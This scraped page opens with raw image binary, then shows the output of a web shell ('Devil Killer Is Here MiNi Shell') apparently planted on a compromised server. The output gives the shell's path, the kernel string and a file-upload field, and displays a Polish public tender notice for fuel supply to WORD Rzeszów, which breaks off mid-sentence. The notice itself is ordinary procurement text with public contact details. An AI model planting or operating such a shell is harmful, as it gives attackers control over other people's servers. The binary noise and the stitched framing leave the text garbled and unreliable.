JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250206/0009237901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa paliw w obrocie bezgotówkowym <br/>dla Wojewódzkiego Ośrodka Ruchu Drogowego w Rzeszowie w okresie 36 miesięcy. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI OŚRODEK RUCHU DROGOWEGO W RZESZOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690541260</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Wyzwolenia 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-501</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 17 860 56 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">word@word.rzeszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.word.rzeszow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa paliw w obrocie bezgotówkowym <br/>dla Wojewódzkiego Ośrodka Ruchu Drogowego w Rzeszowie w okresie 36 miesięcy. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8a5c26e0-15fc-4269-aa69-0fa43ea6a417</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00092379</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-8a5c26e0-15fc-4269-aa69-0fa43ea6a417 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). <br/>2. Zamawiający wyznacza do kontaktu z Wykonawcami Pana Roberta Maderę – e-mail: rmadera@word.rzeszow.pl, kom. 661 432 927 <br/>3. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: word@word.rzeszow.pl (nie dotyczy składania ofert).<br/>4. Pozostałe informacje dot. komunikacji elektronicznej zawarte są w Rozdziale II Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów <br/>w sprawie wymagań dla dokumentów elektronicznych. <br/>2. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, wskazane w rozdziale IX i X SWZ, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia KRI, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania. <br/>3. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej: <br/>1)	w formatach danych określonych w przepisach Rozporządzenia Rady Ministrów z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2024 r. poz. 773) - i przekazuje się jako załącznik, lub <br/>2)	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”). <br/>4. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny). <br/>5. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia. <br/>6. Pozostałe informacje dot. komunikacji elektronicznej zawarte są w Rozdziale II Specyfikacji Warunków Zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że: <br/>1)	Administratorem danych osobowych jest Wojewódzki Ośrodek Ruchu Drogowego <br/>w Rzeszowie, al. Wyzwolenia 4, 35-501 Rzeszów, tel. 17 8605600, e-mail: word@word.rzeszow.pl ;<br/>2)	Inspektorem Ochrony Danych jest Pani Bożena Wróbel, kontakt z Inspektorem Ochrony Danych – iod@word.rzeszow.pl, telefonicznie pod nr 605 266 300, listownie na adres siedziby Administratora, kontakt osobisty w siedzibie Administratora w Rzeszowie;<br/>3)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych spoczywający na WORD jako jednostce sektora finansów publicznych;<br/>4)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp; <br/>5)	dane osobowe będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6)	obowiązek podania danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>7)	w odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a)	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników;<br/>c)	na podstawie art. 18 RODO prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego;<br/>d)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>a)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. <br/>2.	Jednocześnie WORD w Rzeszowie przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie o najmniej jedno z wyłączeń, o których mowa w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DAT.261.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest sukcesywna dostawa paliw, tj.: benzyny bezołowiowej, oleju napędowego oraz skroplonego gazu ropopochodnego LPG (zwane dalej: „paliwami”) do pojazdów i urządzeń eksploatowanych przez Wojewódzki Ośrodek Ruchu Drogowego <br/>w Rzeszowie, polegająca na zapewnieniu możliwości tankowania paliwa odpowiednio:<br/>1)	dla pojazdów wskazanych w zał. nr 2 do umowy oraz dla pojazdów ich zastępujących (pojazdy zastępcze) oraz dla pojazdów aktualnie eksploatowanych przez Zamawiającego – do zbiorników tychże pojazdów, <br/>2)	dla ciągnika rolniczego URSUS oraz dla urządzeń Zamawiającego (w szczególności kosiarek/kos spalinowych, dmuchawy do liści, zamiatarki, agregatu itp.) – do kanistra,<br/>w dni robocze od poniedziałku do piątku w godz. 6.00 - 20.00, a w soboty w godz. 6.00 – 16.00 na stacji/stacjach paliw Wykonawcy na terenie miasta Rzeszowa, a w nielicznych przypadkach także na terenie całego kraju.<br/>2.	Dostawa paliw objętych przedmiotem zamówienia polegać będzie na bezgotówkowym sukcesywnym (uzależnionym od potrzeb) tankowaniu pojazdów i pobieraniu paliwa do kanistrów dla urządzeń eksploatowanych przez Zamawiającego.<br/>3.	Przewidywane maksymalne ilości paliwa, jakie Zamawiający zamierza zakupić w okresie trwania umowy:<br/>1)	Benzyna bezołowiowa o liczbie oktanowej Pb 95 – do 15 000 litrów;<br/>2)	Olej napędowy – do 70 000 litrów;<br/>3)	Skroplony gaz ropopochodny LPG – do 75 000 litrów .<br/>4.	Zamawiający zastrzega sobie prawo do niezrealizowania zakupu powyżej:<br/>1) 5 000 litrów benzyny bezołowiowej Pb95,<br/>2) 23 000 litrów oleju napędowego,<br/>3) 25 000 litrów ropopochodnego gazu LPG. <br/>Z tytułu niezrealizowania przez Zamawiającego zakupu paliwa powyżej ilości wskazanych <br/>w pkt 1)-3) Wykonawcy nie przysługują żadne roszczenia. Zamawiający zapłaci jedynie <br/>za paliwo faktycznie pobrane.<br/>5.	Po pobraniu przez Zamawiającego minimalnych ilości paliw określonych w ust. 4 pkt 1)-3), Zamawiający zastrzega sobie możliwość, celem dostosowania do aktualnych potrzeb Zamawiającego, odpowiedniego zwiększenia bądź zmniejszenia ilości danego rodzaju paliwa na rzecz innego rodzaju, w ramach środków finansowych przeznaczonych na realizację zamówienia – tj. do wysokości wynagrodzenia Wykonawcy określonego w § 6 ust. 1 umowy a Wykonawca nie będzie wnosił z tego tytułu żadnych roszczeń.<br/>6.	Paliwa winny spełniać standardy określone w:<br/>1)	Rozporządzeniu Ministra Klimatu i Środowiska z dnia 26 czerwca 2024 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz.U. 2024 r., poz. 1018),<br/>2)	Rozporządzeniu Ministra Klimatu i Środowiska z dnia 26 czerwca 2024 r. w sprawie metod badania jakości paliw ciekłych (Dz.U. 2024.1058),<br/>3)	odpowiednio właściwych polskich normach obowiązujących w chwili dostawy. <br/>W przypadku zmiany obowiązujących norm jakościowych w trakcie trwania Umowy, Wykonawca dostosuje, jakość paliw do nowych norm.<br/>7.	Dostawy oleju napędowego dotyczą gatunku odpowiedniego dla okresu letniego, przejściowego i zimowego. Wykonawca Umowy zapewni Zamawiającemu dostawę danego gatunku oleju napędowego w zależności od aktualnej temperatury otoczenia.<br/>8.	Dostawa paliw odbywać się będzie bezgotówkowo, przy użyciu elektronicznych kart paliwowych, bezpośrednio do zbiorników paliwowych pojazdów eksploatowanych przez Zamawiającego na stacji paliw Wykonawcy i do kanistrów, zgodnie z rozdziałem IV ust. 1 SWZ i bez konieczności każdorazowego wystawiania faktury VAT.<br/>9.	Elektroniczne karty paliwowe:<br/>1)	obejmować będą:<br/>a)	Karty przyporządkowane do konkretnych pojazdów (około 40 szt.) – dla każdego pojazdu eksploatowanego przez Zamawiającego wskazanego w załączniku nr 2 do umowy; <br/>b)	Karty imienne i na okaziciela (około 3 szt.) – do tankowania do kanistra (dla urządzeń i ciągnika rolniczego Zamawiającego) i/lub do tankowania innych pojazdów eksploatowanych przez Zamawiającego, a nie ujętych w zał. nr 2 do umowy (w szczególności pojazdów zastępczych),<br/>2)	uprawniać będą wyłącznie do zakupu paliw objętych przedmiotem umowy;<br/>3)	uprawniać będą do dokonywania zakupów paliw wyłącznie na stacji/stacjach paliw Wykonawcy, rozmieszczonych na terenie Miasta Rzeszów, jak i całego kraju;<br/>4)	obligatoryjnie muszą być zabezpieczone kodem PIN; <br/>5)	wystawione i/lub wymienione będą Zamawiającemu nieodpłatnie. Wszystkie karty będą wystawiane w terminie 10 dni roboczych, licząc od dnia złożenia zapotrzebowania, z zastrzeżeniem, że jedna karta na okaziciela zostanie dostarczona do Zamawiającego w ciągu 3 dni roboczych.<br/>6)	w razie utraty którejkolwiek z kart Zamawiający niezwłocznie powiadomi (pisemnie - w tym za pośrednictwem poczty elektronicznej, bądź telefonicznie) Wykonawcę o fakcie utraty. Od momentu zgłoszenia utraty karty, Wykonawca nie może sprzedawać paliwa na jej podstawie. <br/>7)	Koszty związane z wydaniem i obsługą kart w całym okresie umowy ponosi Wykonawca.<br/>10.	Po dostarczeniu bezgotówkowych kart elektronicznych Wykonawca zobowiązany jest prowadzić ewidencję dokonanych transakcji, która będzie zawierać w szczególności:<br/>1)	datę, dokładny czas i miejsce zakupu paliwa;<br/>2)	numer rejestracyjny pojazdu, do którego zakupiono paliwo;<br/>3)	rodzaj, ilość, cenę (jednostkową 1 litra paliwa brutto) zakupionego paliwa, należny upust cenowy dla zakupionego paliwa;<br/>4)	numer karty, na którą dokonano zakupu;<br/>5)	nazwę i adres stacji paliw, na której dokonano transakcji<br/>11.	Wykonawca zobowiązany jest stosować w trakcie realizacji zamówienia:<br/>1)	cenę równą cenie brutto za 1 litr danego paliwa (tj. benzyny bezołowiowej o liczbie oktanowej 95, oleju napędowego oraz skroplonego gazu ropopochodnego LPG) obowiązującą na stacji paliw Wykonawcy, na której Zamawiający tankuje pojazd i/lub pobiera paliwo do kanistra, w dniu zakupu (tankowania) – tj. cenę z dystrybutora;<br/>2)	rabat w wysokości określonej w ofercie Wykonawcy (w zł za litr paliwa) liczony od ceny brutto, o której mowa w pkt 1). Rabat będzie uwzględniony na każdej fakturze wystawionej przez Wykonawcę od wartości pobranego przez Zamawiającego paliwa w okresie rozliczeniowym.<br/>12.	Bezgotówkowy sposób rozliczania transakcji będzie potwierdzany wystawieniem zbiorczej faktury każdorazowo po zakończeniu pełnego okresu rozliczeniowego. Faktura będzie obejmowała należność z tytułu sprzedaży paliwa dokonanej w tym okresie. Ustalony zostaje okres rozliczeniowy od 1. (pierwszego) do 15 (piętnastego) i od 16 (szesnastego) do ostatniego dnia miesiąca. Za datę sprzedaży uznaje się ostatni dzień okresu rozliczeniowego.<br/>13.	Do każdej zbiorczej faktury VAT Wykonawca obligatoryjnie dołączy zestawienie, obejmujące następujące dane:<br/>1)	datę tankowania;<br/>2)	wskazanie stacji paliw, na której dokonano tankowania;<br/>3)	numer rejestracyjny pojazdu;<br/>4)	rodzaj paliwa;<br/>5)	numer karty paliwowej;<br/>6)	ilość zakupionego paliwa;<br/>7)	cenę brutto paliwa (przed i po rabacie)<br/>8)	wartość brutto zakupionego paliwa (po rabacie).<br/>chyba, że dane, o których mowa w pkt 1) -6) znajdują się w treści faktury.<br/>14.	Wykonawca gwarantuje możliwość bezgotówkowego tankowania paliwa do kanistrów dla urządzeń eksploatowanych przez Zamawiającego oraz do ciągnika rolniczego URSUS, na podstawie karty imiennej i/lub na okaziciela.<br/>15.	W przypadku braku możliwości tankowania paliw na stacji paliw Wykonawcy wskazanej w ofercie - tj. stacji, o której mowa w § 1 ust. 10 umowy, (np. brak paliwa, awaria urządzeń) Zamawiającemu służy prawo tankowania paliwa o takich samych parametrach na innej stacji paliw Wykonawcy zlokalizowanej na terenie miasta Rzeszowa, po cenie obowiązującej na dystrybutorze w chwili zakupu, z uwzględnieniem rabatu wskazanego w ofercie. W przypadku gdy Wykonawca nie posiada innej stacji paliw na terenie miasta Rzeszowa, Zamawiającemu służy prawo tankowania paliwa na dowolnej stacji paliw na terenie miasta Rzeszowa, z zastrzeżeniem, że Wykonawca zwróci Zamawiającemu różnicę ceny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09133000-0 - Skroplony gaz ropopochodny (LPG)</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09134100-8 - Olej napędowy</p> <p class="mb-0">09132100-4 - Benzyna bezołowiowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1%=1pkt. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %.<br/>2. Łączna liczba punktów stanowi sumę punktów przyznanych w kryteriach oceny ofert.<br/>3. Ocena punktowa będzie dotyczyć wyłącznie ofert uznanych za ważne i niepodlegających odrzuceniu. Punkty będą liczone z dokładnością do dwóch miejsc po przecinku.<br/>4. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą ilość punktów. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Zamawiający dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert. <br/>5. W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert.<br/>6. Jeżeli zaoferowana cena, lub jej istotne 